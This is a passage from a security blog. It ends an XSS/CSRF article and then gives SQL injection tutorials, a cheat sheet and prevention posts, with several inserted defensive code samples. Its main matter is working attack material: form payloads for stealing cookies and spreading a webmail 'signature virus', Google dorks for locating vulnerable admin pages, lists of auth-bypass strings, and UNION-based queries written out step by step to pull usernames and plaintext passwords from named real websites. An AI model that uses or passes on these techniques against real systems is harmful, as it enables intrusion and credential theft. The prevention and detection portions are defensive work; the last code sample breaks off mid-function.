persistent to prevent further users on the computer from logging in to<br />
the account.<br />
Building upon the code presented above we can circumvent any<br />
restrictions and still steal the session cookie for the temporary<br />
session. Unfortunately the time window in which attacks can take<br />
place in many cases is very small, with the help of iDefense's idea of<br />
automating attacks this small time window is no longer an issue. By<br />
adding code on the intermediary web page which opens a new<br />
window with the login prompt the user may now log in to the secured<br />
area (some social engineering might be required in order to force the<br />
user to log in). See code below.<br />
<form method="POST" action="http://vulnerable.com/search"<br />
name="explForm"><br />
<input type=hidden name=q value="<script>alert<br />
(document.cookie)</script>"><br />
</form><br />
<script language="Javascript"><br />
window.open("http://vulnerable.com/secure_login");<br />
setTimeout('explForm.submit()', 1000*30);<br />
</script><br />
Note: changes from previous code displayed in bold<br />
With the intermediary web page still in the background, the form<br />
submission may now be timed to allow the user to log in successfully<br />
before the exploit is sent. To change the time until the form is<br />
submitted change the second argument in the setTimeout function,<br />
this is the time in milliseconds until the javascript code in argument<br />
one is executed. With the user successfully logged in a child window<br />
of the intermediary web page, when the form on the intermediary web<br />
page is submitted the form will go directly to the problematic script,<br />
malicious code inserted, and the user session may be stolen.<br />
Using an intermediary for exploitation slightly increases the<br />
complexity of a successful attack but allows for a high degree of<br />
flexibility, any variable that is used on a dynamically created web<br />
page which does not sanitize HTML markup is vulnerable to cross site<br />
scripting.<br />
<br />
<b>Generalized Client Automation</b><br />
Generalizing on the above technique brings to light another, and in<br />
some cases a very serious, vulnerability. The proposed technique<br />
allows an attacker to fill out forms with data they specify and submit<br />
them automatically under the context of the client. Any forms which<br />
accept data from the client, assuming they in fact inputted the data<br />
they are submitting, are vulnerable.<br />
This arises when the form itself is dependent only on static or<br />
predictable information (information given to a third party site such<br />
as referrer can help in prediction). Using the method of exploitation<br />
presented above, client automation of form submission is a trivial<br />
task.<br />
<form method="POST"<br />
action="http://vulnerable.com/changeMailSettings" name="f"><br />
<input type=hidden name=reply_to value="attacker@h4x.com"><br />
<input type=hidden name=signature value="<a<br />
href=http://h4x.com/exploit.htm>Click here</a> for a free<br />
computer security test, trust me, I used it and was<br />
amazed!"><br />
</form><br />
<script language="Javascript"><br />
f.submit();<br />
</script><br />
An interesting use of this would be the creation of a webmail<br />
signature virus. Using the techniques presented above the attacker<br />
could compose a web page that when visited would automate the<br />
form which changes the signature sent out on emails to contain the<br />
link to the malicious page itself. Every time a user “infected” with the<br />
signature virus would send an email unknowingly they would also<br />
send along text and a link persuading the next victim to also click it,<br />
and become infected. Easy automated spamming? Yes.<br />
Hotmail and Yahoo! Mail have both been tested for this vulnerability<br />
and they are secure against it, however each appear to have<br />
combated the flaw in very different ways. Hotmail uses a simple<br />
referrer check, if the referrer is not from an authorized Hotmail page<br />
the user is sent directly to a login page. Yahoo enacted a very novel<br />
approach to fix the problem, on each form there is a hidden value<br />
named “.crumb” which is related to the cookie. All protection against<br />
this flaw lies within the crumb, if the crumb can be predicted without<br />
the cookie then Yahoo is vulnerable to this flaw.<br />
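<br />
The two defences just described, a referrer check and a crumb tied to the cookie, can be sketched as follows. This is an added example, not code from the original article and not Hotmail's or Yahoo's implementation; the host name, cookie values, key and request shape are constructed, and HMAC-SHA256 is an assumed way of relating the crumb to the cookie.<br />

```python
import hashlib
import hmac
from urllib.parse import urlsplit

ALLOWED_ORIGIN = ("https", "mail.example.test")   # constructed host name


def referrer_is_internal(referrer):
    """Referrer check: the Referer must parse to exactly our scheme and host."""
    if not referrer:
        return False
    try:
        parts = urlsplit(referrer)
    except ValueError:
        return False
    # Compare parsed components; a string-prefix test would also accept
    # https://mail.example.test.attacker.example/
    return (parts.scheme, parts.hostname) == ALLOWED_ORIGIN


def make_crumb(key, session_cookie, action):
    """Crumb bound to the session cookie and to one form action."""
    message = action.encode() + b"\x00" + session_cookie.encode()
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def weak_crumb(username):
    """Anti-pattern: built only from public data, so it can be predicted
    without the cookie, which is the failure condition the text names."""
    return hashlib.md5(username.encode()).hexdigest()


def handle_settings_post(key, request):
    """Server-side gate for a state-changing form; returns (status, reason)."""
    cookie = request.get("cookie")
    if not cookie:
        return 401, "login required"
    if not referrer_is_internal(request.get("referrer")):
        return 403, "referrer rejected"
    supplied = request.get("form", {}).get(".crumb", "")
    expected = make_crumb(key, cookie, request["action"])
    # Constant-time comparison so the crumb cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "crumb rejected"
    return 200, "settings changed"


def demo(key=b"constructed-demo-key-not-for-use"):
    """Run three constructed requests through the gate."""
    action = "/changeMailSettings"
    victim_cookie = "sid=7f3c9a-constructed"
    other_cookie = "sid=00aa11-constructed"
    legit = {
        "cookie": victim_cookie, "action": action,
        "referrer": "https://mail.example.test/settings",
        "form": {"reply_to": "user@example.test",
                 ".crumb": make_crumb(key, victim_cookie, action)},
    }
    # Auto-submitted form on a third-party page: the browser attaches the
    # victim's cookie, but the Referer is foreign and no crumb is present.
    forged = {
        "cookie": victim_cookie, "action": action,
        "referrer": "https://attacker.example/page.htm",
        "form": {"reply_to": "attacker@attacker.example"},
    }
    # Referer passes, but the crumb was issued for a different session.
    wrong_session = {
        "cookie": victim_cookie, "action": action,
        "referrer": "https://mail.example.test/compose",
        "form": {"reply_to": "attacker@attacker.example",
                 ".crumb": make_crumb(key, other_cookie, action)},
    }
    return [handle_settings_post(key, r) for r in (legit, forged, wrong_session)]


if __name__ == "__main__":
    for status, reason in demo():
        print(status, reason)
```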
<br />
<b>Prevention</b><br />
Because the generalized client automation attack is very simple at the<br />
server end (ideally the server views only a legitimate request by the<br />
client) it is somewhat more difficult to prevent. Due to the fact that<br />
the client forms the request at their browser HTTP Referrer headers<br />
can be trusted and should be validated to ensure they come from an<br />
internal script inside the system. Referrer checking assumes however<br />
that the attacker can not insert arbitrary HTML in to any of the<br />
trusted scripts, though such attack would be considered cross site<br />
scripting and separate from this.<br />
At the very minimum to protect against cross site scripting attacks<br />
user input must be stripped of any potentially dangerous characters<br />
such as < > “ &. As any conscientious security professional would do,<br />
I must preach the importance of the whitelisting approach over<br />
blacklisting; in whitelisting only explicitly allowed characters are<br />
permitted in the input. It appears that all security vulnerabilities stem<br />
from user input, “Hello world” can not be exploited unless the<br />
attacker can manage in some form to input data. This should lead us<br />
to believe that it is trivial to ensure security (in a large number of<br />
cases, but not all) by validating user input to a strict form.<br />
Regular expressions are extremely powerful for the task of<br />
whitelisting characters and validating that data does in fact conform<br />
to the form standards (include length constraints also in the concept<br />
of form). Once data is validated to a set of criteria security analysis is<br />
purely creative thinking of how the criteria may be managed to let<br />
through specific items it should not.<br />
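<br />
A whitelist of the kind described above, paired with output encoding for values that are echoed back into a page, as an added example (not from the original article). The allowed character set, the 64-character limit and the function names are assumptions chosen for a search box; the loose pattern shows one way a criterion can let through an item it should not.<br />

```python
import html
import re

# Assumed policy for a search box: letters, digits, space and . , _ -
# between 1 and 64 characters. Length is part of the form being validated.
SEARCH_TERM = re.compile(r"[A-Za-z0-9 .,_-]{1,64}")

# A filter that looks equivalent but is not: "$" also matches just before a
# trailing newline, so "abc\n" is accepted by match().
LOOSE_TERM = re.compile(r"^[A-Za-z0-9 .,_-]{1,64}$")


def validate_search_term(raw):
    """Whitelist check: return the term unchanged, or None if it does not conform."""
    if isinstance(raw, str) and SEARCH_TERM.fullmatch(raw):
        return raw
    return None


def encode_for_html(value):
    """Encode & < > " ' so the value stays data inside element text and
    inside a quoted attribute value."""
    return html.escape(value, quote=True)


def render_search_page(raw_q):
    """Validate first, then encode on output; rejected input is never echoed."""
    term = validate_search_term(raw_q)
    if term is None:
        return '<p class="error">Invalid search term.</p>'
    safe = encode_for_html(term)
    return ('<input type="text" name="q" value="' + safe + '">'
            "<p>Results for " + safe + "</p>")


def render_hidden_field(name, value):
    """Free-text values (a signature, a message body) cannot be whitelisted
    down to a few characters, so encoding on output is what keeps a "> in
    the value from closing the attribute."""
    return ('<input type="hidden" name="' + encode_for_html(name) +
            '" value="' + encode_for_html(value) + '" />')


if __name__ == "__main__":
    probe = '"><script>alert("Xss")</script>'   # string quoted on this page
    print(render_search_page("guitar strings"))
    print(render_search_page(probe))
    print(render_hidden_field("milk", probe))
```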
Another option to aid in the prevention of security flaws is a project I<br />
am affiliated with, currently code named Nirvana. This project is<br />
devoted to the creation of user input filters and validation functions to help<br />
developers create secure code faster. The project page is now housed<br />
at http://libox.net/sanitize.php but will soon be moving to<br />
http://www.owasp.org.<br />
My home on the web is http://libox.net/, the most current version of<br />
this document may be found there.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com11tag:blogger.com,1999:blog-8450897627020793899.post-81711188656419439822012-11-22T07:39:00.000-08:002012-12-01T09:08:27.119-08:00sql injection attack<div dir="ltr" style="text-align: left;" trbidi="on">Q what is sql injection?<br />
<br />
A injecting sql queries into another database or using queries to get auth bypass as an admin.<br />
<br />
part 1 : Basic sql injection<br />
<br />
Gaining auth bypass on an admin account.<br />
Most sites vulnerable to this are .asp<br />
First we need to find a site. Start by opening Google.<br />
Now we type our dork. Definition of dork: "a search entry for a certain type of site/exploit, etc."<br />
There is a large number of Google dorks for basic SQL injection.<br />
Here are the best:<br />
"inurl:admin.asp"<br />
"inurl:login/admin.asp"<br />
"inurl:admin/login.asp"<br />
"inurl:adminlogin.asp"<br />
"inurl:adminhome.asp"<br />
"inurl:admin_login.asp"<br />
"inurl:administratorlogin.asp"<br />
"inurl:login/administrator.asp"<br />
"inurl:administrator_login.asp"<br />
<br />
Now what to do once we get to our site.<br />
the site should look something like this :<br />
<br />
welcome to xxxxxxxxxx administrator panel<br />
username :<br />
password :<br />
<br />
so what we do here is in the username we always type "Admin"<br />
and for our password we type our sql injection<br />
<br />
here is a list of sql injections<br />
<br />
' or '1'='1<br />
' or 'x'='x<br />
' or 0=0 --<br />
<br />
" or 0=0 --<br />
<br />
or 0=0 --<br />
<br />
' or 0=0 #<br />
<br />
" or 0=0 #<br />
<br />
or 0=0 #<br />
<br />
' or 'x'='x<br />
<br />
" or "x"="x<br />
<br />
') or ('x'='x<br />
<br />
' or 1=1--<br />
<br />
" or 1=1--<br />
<br />
or 1=1--<br />
<br />
' or a=a--<br />
<br />
" or "a"="a<br />
<br />
') or ('a'='a<br />
<br />
") or ("a"="a<br />
<br />
hi" or "a"="a<br />
<br />
hi" or 1=1 --<br />
<br />
hi' or 1=1 --<br />
'or'1=1'<br />
<br />
<br />
there are many more but these are the best ones that i know of<br />
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.<br />
<br />
So your input should look like this<br />
<br />
username:Admin<br />
password:'or'1'='1<br />
<br />
So click submit and you're in<br />
NOTE not all sites are vulnerable.<br />
<br />
<br />
part 2: injecting sql queries to extract the admin username and password<br />
<br />
ok so lets say we have a site :<br />
http://www.xxxxx.com/index.php?catid=1<br />
here is a list of dorks for sites like this<br />
<br />
"inurl:index.php?catid="<br />
"inurl:news.php?catid="<br />
"inurl:index.php?id="<br />
"inurl:news.php?id="<br />
or the best in my view "full credit to qabandi for discovering this"<br />
"inurl:".php?catid=" site:xxx"<br />
<br />
<br />
So once you have your site<br />
http://www.xxxx.com/index.php?catid=1<br />
now we add a ' to the end of the url<br />
so the site is<br />
http://www.xxxx.com/index.php?catid=1'<br />
if there is an error of some sort then it is vulnerable<br />
now we need to find the number of columns in the sql database<br />
so we type<br />
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"<br />
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"<br />
<br />
so this database has 4 columns because we got an error on 5<br />
on some databases there is 2 columns and on some 200 it varies<br />
so once we have the column number.<br />
we try the union function<br />
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"<br />
if you see some numbers like 1 2 3 4 on the screen or the column names<br />
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db<br />
so now we need info about the db<br />
so lets say the numbers 2 and 4 showed up on the screen<br />
so i will use my query on 2<br />
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--<br />
the db type and version will pop up on the screen<br />
if the db version is 4 or lower then to extract the password you will need these queries<br />
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--<br />
this should display the table containing the admin username and password<br />
but if not then you will have to guess the table<br />
so once you have your table "or not"<br />
then type<br />
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--<br />
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess<br />
then once u have the right table name you should get the administrator password<br />
then just do the same thing but type username instead of password<br />
sometimes the password is hashed and you need to crack it.<br />
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de..../admin_1.2_.txt<br />
now if the database is version 5 or up<br />
type<br />
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--<br />
and that will display a list of all the tables<br />
once you have your table name<br />
type the same thing as 4<br />
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--<br />
then the same with username<br />
but if it doesn't work for all those things,<br />
just toy around with all the little variations: catid=1 or catid=-1, or instead of -- put /* or even nothing<br />
just play around with those<br />
but sometimes we also need to use the version() or version@@<br />
so sometimes UNION SELECT version (),password,3,4 FROM admintable--<br />
or UNION SELECT version @@,password,3,4 FROM admintable-- </div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com17tag:blogger.com,1999:blog-8450897627020793899.post-29612725985594569692012-11-22T07:36:00.003-08:002012-11-27T21:54:32.490-08:00sql injection cheat sheet<div dir="ltr" style="text-align: left;" trbidi="on">
'or''='<br />
<br />
1 OR 1=1<br />
<br />
1' OR '1'='1<br />
<br />
' or 1=1 or ''='<br />
<br />
' or '1'='1<br />
<br />
' or 'x'='x<br />
<br />
' or 0=0 --<br />
<br />
" or 0=0 --<br />
<br />
or 0=0 --<br />
<br />
' or 0=0 #<br />
<br />
" or 0=0 #<br />
<br />
or 0=0 #<br />
<br />
' or 'x'='x<br />
<br />
" or "x"="x<br />
<br />
') or ('x'='x<br />
<br />
' or 1=1--<br />
<br />
" or 1=1--<br />
<br />
or 1=1--<br />
<br />
' or a=a--<br />
<br />
" or "a"="a<br />
<br />
') or ('a'='a<br />
<br />
") or ("a"="a<br />
<br />
hi" or "a"="a<br />
<br />
hi" or 1=1 --<br />
<br />
hi' or 1=1 --<br />
<br />
'or'1=1'</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6tag:blogger.com,1999:blog-8450897627020793899.post-29245279152056886062012-11-22T07:32:00.003-08:002012-11-27T21:15:56.830-08:00sql injection tutorial with examples<div dir="ltr" style="text-align: left;" trbidi="on">SQL INJECTION:<br />
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user<br />
input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.<br />
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.<br />
<br />
<br />
Imagine that you found this site:<br />
<br />
http://www.guitarists.net/<br />
<br />
<br />
<br />
Now 1st of all we need to Find the url like this to test sql injection.<br />
<br />
id=xyz<br />
<br />
<br />
<br />
Okay suppose we are going with this url<br />
<br />
http://www.guitarists.net/links/list.php?id=253<br />
<br />
<br />
<br />
To test whether list.php handles the id variable badly, we append a single ' to the URL and get an error like the one below:<br />
<br />
http://www.guitarists.net/links/list.php?id=253'<br />
<br />
<br />
<br />
Error:<br />
<br />
Quote:<br />
Fatal error: Call to undefined method DB_Error::numRows() in /home/gnet/public_html/links/list.php on line 57<br />
<br />
<br />
Now we will explore it.<br />
<br />
<br />
The first step of all is to find out how many columns the query has; when we get the correct column count, we'll see something different.<br />
<br />
<br />
Code:<br />
-1+union+select+<br />
<br />
<br />
<br />
This is the basic syntax for this example of attack. Of course it can be<br />
done differently, but I find this easier to start with.<br />
<br />
Keep adding numbers to guess the correct columns, like this:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3-- No results<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,1,2,3,4-- [(:]<br />
<br />
<br />
<br />
The SQL error is gone here, and we have found that the site has 4 columns!<br />
<br />
The number 1 also appears on the page, so we know that column 1 is vulnerable, and it is through it that we are going to steal information.<br />
So now we know we have 4 columns and column 1 is vulnerable. We will use:<br />
<br />
Information_Schema.Tables<br />
<br />
table_name & information_schema.tables--<br />
<br />
<br />
<br />
It helps us to Find the table names. Now our Link Would be Like This<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--<br />
<br />
<br />
<br />
Replacing the vulnerable column 1 in the string table_name.<br />
<br />
<br />
Note: Here you can see all table, but not always that happens in certain websites, so we can see one by one, and for this you use the term +limit+*,1--<br />
<br />
Like:<br />
<br />
http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10+from+information_schema.tables+limit+0,1--<br />
...<br />
<br />
<br />
<br />
Well continuing with our web ...<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,table_name,2,3,4+from+information_schema.tables--<br />
<br />
<br />
<br />
As we can see there are a lot of tables, but the one of interest is no doubt the members table, because we want to steal data from tables such as members, admin, administrators, etc.<br />
<br />
As we can see there is no table like Administrator or admin, so now we will explore members and check what info it has.<br />
Now we need to see the columns that the table has, so we use the syntax:<br />
<br />
column_name &<br />
information_schema.columns<br />
<br />
<br />
<br />
And our url will be like this.<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--<br />
<br />
<br />
<br />
Don't be confused, I am going to explain it now :-j<br />
<br />
+where ---> Where?<br />
+table_name= ---> Name of Table?<br />
char() ---> Name of Table in ASCII<br />
<br />
<br />
e.g:<br />
<br />
Code:<br />
m = 109<br />
e = 101<br />
m = 109<br />
b = 98<br />
e = 101<br />
r = 114<br />
s = 115 <br />
<br />
<br />
<br />
Google it "Table in ASCII" you will get the whole table.<br />
<br />
Well, now let's find out what we see in<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,column_name,2,3,4+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--<br />
<br />
<br />
<br />
w0w we succeeded to grab the required info.<br />
<br />
Cheers!!<br />
<br />
Well, what interests us are the columns<br />
<br />
for login and password, that is:<br />
<br />
Well, now we make the final injection, to steal the login and password data.<br />
<br />
The injection is made in the following way:<br />
<br />
To see Login:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strUsername,2,3,4+from+members--<br />
<br />
<br />
<br />
To see Passwords:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,strPassword,2,3,4+from+members--<br />
<br />
<br />
<br />
There is a much simpler method, which is to see everything<br />
at the same time using the syntax.<br />
<br />
concat( )<br />
<br />
<br />
<br />
well, concat serves to unite all at once, then our url would be like this:<br />
<br />
http://www.guitarists.net/links/list.php?id=-1+union+select+0,concat(strUsername,0x3a,strPassword),2,3,4+from+members--<br />
<br />
<br />
<br />
Quote<br />
0x3a -> hexadecimal code for the : character, used to insert a : between one value and the next so they are not confused<br />
<br />
<br />
All passwords are in plain text, not hashed!<br />
<br />
Hope this tutorial helps you to learn sql injection. And to understand different techniques related to sql injection.<br />
<br />
This Tutorial is Written for Educational purpose, I am not responsible if anyone use it for illegal purpose. <br />
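<br />
The probing sequence walked through in this post and in the earlier "order by" walkthrough (a quote that triggers an error, a growing column count, then information_schema lookups) leaves a recognisable trail in web server access logs. The following detector is an added example, not part of the original posts; the log lines, client addresses and rule names are constructed, and the log format is assumed to be Common Log Format.<br />

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Common Log Format prefix: client, two ignored fields, timestamp, request, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Keyword rules applied to the decoded, lower-cased query string. They can
# false-positive on free-text fields, so treat hits as leads, not verdicts.
RULES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+")),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("char-literal", re.compile(r"\bchar\(\s*\d+(?:\s*,\s*\d+)*\s*\)")),
]
QUOTE_PROBE = re.compile(r"=[^&]*'(?:&|$)")      # parameter value ending in '
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)")
UNION_COLS = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.*?)(?:\s+from\b|--|#|$)")


def normalize(target):
    """Decode %xx and '+', lower-case, fold /**/ comments and whitespace."""
    text = unquote_plus(urlsplit(target).query).lower()
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip()


def union_width(text):
    """Number of columns in a UNION SELECT list, or None if there is none."""
    found = UNION_COLS.search(text)
    if not found:
        return None
    cols = found.group(1)
    while True:                       # drop (...) so commas inside calls are ignored
        stripped = re.sub(r"\([^()]*\)", "", cols)
        if stripped == cols:
            return cols.count(",") + 1
        cols = stripped


def analyze(lines, min_steps=3):
    """Return {(client_ip, path): sorted rule names} for the given log lines."""
    found = defaultdict(set)
    widths = defaultdict(set)         # distinct column counts tried per client/path
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        key = (m["ip"], urlsplit(m["target"]).path)
        text = normalize(m["target"])
        for name, rule in RULES:
            if rule.search(text):
                found[key].add(name)
        if m["status"].startswith("5") and QUOTE_PROBE.search(text):
            found[key].add("quote-error")
        order_by = ORDER_BY.search(text)
        if order_by:
            widths[key].add(int(order_by.group(1)))
        width = union_width(text)
        if width is not None:
            widths[key].add(width)
    for key, seen in widths.items():
        if len(seen) >= min_steps:    # same client stepping through column counts
            found[key].add("column-enumeration")
    return {key: sorted(names) for key, names in found.items()}


# Constructed sample lines (documentation address ranges, made-up timestamps).
TS = "[22/Nov/2012:07:30:00 -0800]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {TS} "GET /links/list.php?id=253 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {TS} "GET /links/list.php?id=253%27 HTTP/1.1" 500 310',
    f'203.0.113.7 - - {TS} "GET /links/list.php?id=-1+union+select+0-- HTTP/1.1" 200 900',
    f'203.0.113.7 - - {TS} "GET /links/list.php?id=-1+union+select+0,1-- HTTP/1.1" 200 900',
    f'203.0.113.7 - - {TS} "GET /links/list.php?id=-1+union+select+0,1,2-- HTTP/1.1" 200 900',
    f'203.0.113.7 - - {TS} "GET /links/list.php?id=-1%20UNION/**/SELECT%200,column_name,2,3,4'
    f'+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114,115)--'
    f' HTTP/1.1" 200 4100',
    f'198.51.100.23 - - {TS} "GET /index.php?catid=1+order+by+1-- HTTP/1.1" 200 2000',
    f'198.51.100.23 - - {TS} "GET /index.php?catid=1+order+by+2-- HTTP/1.1" 200 2000',
    f'198.51.100.23 - - {TS} "GET /index.php?catid=1+order+by+3-- HTTP/1.1" 500 300',
    f'192.0.2.50 - - {TS} "GET /search?q=how+to+order+by+phone HTTP/1.1" 200 1500',
]

if __name__ == "__main__":
    for (ip, path), names in analyze(SAMPLE_LOG).items():
        print(ip, path, ", ".join(names))
```

Login-form payloads sent in a POST body do not appear in an access log, so this only covers the URL-based probes.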
</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6tag:blogger.com,1999:blog-8450897627020793899.post-52147176332728858502012-11-22T07:30:00.001-08:002012-12-01T09:08:14.278-08:00What is a sql injection<div dir="ltr" style="text-align: left;" trbidi="on">What is SQL Injection?<br />
SQL Injection - \S-Q-L-in-'jek-shen\ - Noun<br />
The technique of inputting malicious data into an SQL statement, which would therefore make the vulnerability present on the database layer.<br />
<br />
What It Looks Like?<br />
The vast majority of all SQL injections will take place on an input form.<br />
The most basic of all SQL injections will look like the following:<br />
<br />
The Basic SQL injection is :<br />
<br />
<br />
Quote:<br />
Variable' or 1=1--<br />
<br />
<br />
Let’s say we have a login form. By inputting the above code, we can use our SQL injection to gain login even without proper credentials!<br />
<br />
How’s it work?<br />
Take a look..<br />
<br />
<br />
Code:<br />
SELECT * FROM users WHERE username = 'Variable' or 1=1--'<br />
<br />
<br />
<br />
See how our code is nicely injected into the query? The result of this query will grant us access regardless of the username, since the result of “1=1” will always be true. In this case, we bypass the whole selection process.<br />
<br />
You may have been wondering what the double dashes are for ( -- ). These dashes at the end tell the SQL server to ignore the rest of the query. If the exploit isn’t being used on an SQL server, then omitting the double dashes and ending single quote will get the desired results.<br />
<br />
Note that while this is the most standard way, it certainly isn’t the only way that malicious users will gain entry. SQL queries will differ greatly from one syntax to another.<br />
It’s also common to see the following:<br />
<br />
<br />
Code:<br />
') or ('1'='1<br />
"or "1"="1<br />
' or '1'='1<br />
Or 1=1--<br />
" or 1=1--<br />
' or 1=1--<br />
<br />
<br />
<br />
SQL Injection: Attacking Via URLs<br />
As we know, it is possible to attack an SQL server through a URL, and this is usually much more dangerous to webmasters.<br />
When using PHP and SQL, there is commonly a URL such as the following:<br />
<br />
<br />
Code:<br />
http://YourWebsite.com/page.php?id=2<br />
<br />
<br />
<br />
By adding a little SQL to the end of the URL, we can attack on SQL server..<br />
<br />
I think this is enough, Now Let’s finally find out how to secure your website from SQL injection.<br />
<br />
<br />
SQL Injection Prevention: Editing Lengths Of Form Components<br />
The first step in the process is simple: simply restrict input fields to the absolute minimum- usually anywhere from 7-12 characters is fine. Doing so will make long queries unable to be input, since the field is only enough characters for smaller queries. This will actually not prevent an SQL injection, but will make work harder for those trying to make use of one.<br />
<br />
Note :SQL injection users can simply make a new form and remove the limits on the character length, since the length is in plain HTML and viewable (and editable) by anyone.<br />
<br />
SQL Injection Prevention: Data Type Validation<br />
Another good idea is to validate any data once it is received. If a user had to input an age, make sure the input is an actual number. If it was a date, make sure the date is in proper format. Again, this will not prevent an SQL injection in itself- it just makes work harder for those trying to exploit an SQL server.<br />
<br />
Note: This is still only slowing attackers down- but isn’t it much more satisfying to have them waste their time before finding out one’s own query is impervious to harm?<br />
<br />
SQL Injection Prevention: The Solution In Preventing SQL Attacks<br />
We’ll accomplish this with a simple function that the developers of PHP made especially for SQL injections. We call this function mysql_real_escape_string() - take a look at it below:<br />
<br />
Code:<br />
$name = "John";<br />
$name = mysql_real_escape_string($name);<br />
$SQL = "SELECT * FROM users WHERE username = '$name'";<br />
<br />
<br />
<br />
Although for a more practical use, we would have the $name variable pointed to a POST result, as seen below:<br />
<br />
Code:<br />
$name = mysql_real_escape_string($_POST['user']);<br />
<br />
<br />
<br />
And we can even make things easier by putting it into one line:<br />
<br />
Code:<br />
$SQL = "SELECT * FROM users WHERE username = '" . mysql_real_escape_string($_POST['user']) . "'";<br />
<br />
<br />
<br />
So what’s the output like if malicious users try to get access to our SQL server?<br />
Their attempts may look something like this:<br />
<br />
<br />
Code:<br />
$malicious_input = "' OR 1'";<br />
// The above is the malicious input. Don't be scared!<br />
// With mysql_real_escape_string(), the following is obtained:<br />
<br />
// \' OR 1\'<br />
// Notice how the slashes escape the quotes! Now users can't enter malicious data<br />
<br />
<br />
<br />
And the best part is, they just wasted their time and effort for nothing.<br />
<br />
Lastly, note that there are libraries and classes that can help in the fight against SQL injection. Prepared statements are an option as well, but as for us, we enjoy sticking to the mysql_real_escape_string() function for fewer headaches.<br />
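An added example, not code from the original post: it replays the measures above (type validation, quote escaping, prepared statements) against a constructed in-memory table, using Python's sqlite3 module instead of PHP and MySQL so that it runs offline. The table, the inputs and `escape_quotes()` (a hypothetical stand-in for an escaping function such as mysql_real_escape_string()) are assumptions made for the illustration.

```python
import re
import sqlite3


def make_db():
    """Build an in-memory table holding constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, age INTEGER)"
    )
    db.executemany(
        "INSERT INTO users (username, age) VALUES (?, ?)",
        [("john", 31), ("alice", 27), ("bob", 45)],
    )
    return db


def escape_quotes(value):
    """Hypothetical stand-in for an escaping function (assumption, not a PHP API).

    SQLite escapes a single quote inside a string literal by doubling it.
    """
    return value.replace("'", "''")


def names(db, sql, params=()):
    """Run a query and return the usernames in a stable order."""
    return [row[0] for row in db.execute(sql + " ORDER BY id", params)]


def by_name_concat(db, name):
    # Vulnerable: the input is pasted into the SQL text unchanged.
    return names(db, "SELECT username FROM users WHERE username = '" + name + "'")


def by_name_escaped(db, name):
    # Escaped AND quoted: the input cannot leave the string literal.
    return names(
        db,
        "SELECT username FROM users WHERE username = '" + escape_quotes(name) + "'",
    )


def by_age_escaped(db, age):
    # Escaped but NOT quoted (numeric context): there is no quote to escape,
    # so the input is still parsed as SQL. Escaping alone does not help here.
    return names(db, "SELECT username FROM users WHERE age = " + escape_quotes(age))


def by_age_validated(db, age):
    # Data type validation done on the server: digits only, at most 3 of them.
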